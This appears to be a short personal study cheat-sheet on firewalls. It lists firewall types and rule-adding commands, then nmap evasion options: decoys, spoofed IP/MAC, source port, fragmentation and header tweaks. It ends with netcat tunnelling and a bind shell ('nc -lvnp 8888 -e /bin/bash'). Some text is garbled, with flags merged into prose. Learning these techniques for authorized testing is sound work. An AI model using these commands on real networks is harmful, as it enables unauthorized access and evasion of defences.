2.1 KiB
2.1 KiB
Firewall Handling
Types
- Packet filtering
- Circuit level gateway
- Stateful inspection
- Proxy
- Next generation firewall
- Cloud firewall and FWaaS
Rules
Windows
netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
CentOS
firewall-cmd --zone=public --add-port=57869/tcp
Circumvention
- IP/MAC/Port spoofing
- Fragmentation, MTU, data length
- Header modification
nmap
Spoofing
- Decoy
-D, mixin real IP address with random adresses. Every port will be requested by any of these addresses.
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
- Proxy
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
- Spoofed MAC
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
- Spoofed IP
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
- Port Number, select a port which is whitelisted. Frequently this is 53,80,44
sudo nmap -F --source-port 443 $TARGET_IP
- Fragmentation, eth header + 20 bytes header size + bytes fragments via
-f, or 16 bytes via-ff
sudo nmap -Pn -F -f $TARGET_IP
- MTU, works like fragmentation,
-f==--mtu 8
sudo nmap -Pn -F --mtu 8
- DATA Length, eth header + IP header + prepend padding segment size to values of bytes
sudo nmap -Pn -F --data-length 64 $TARGET_IP
Header Fields
- TTL
sudo nmap -Pn -F --ttl 64 $TARGET_IP
-
IP OPTIONS,
--ip-optionsrecordsas hex String- Route,
R - Timestamp,
T - Route + Timestamp,
U - Loose source routing,
L $IP $IP $IP - Strict source routing,
S $IP $IP $IP
- Route,
-
Checksum, craft bad checksum via
--badsumto check errors
sudo nmap -Pn -F --badsum $TARGET_IP
After the FW
- Hopping, listen via netcat to catch that port
- Tunneling, relay open after passsing the firewall to connect to the closed port
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
- Non standard ports, open bin shell via
nc -lvnp 8888 -e /bin/bash
and connect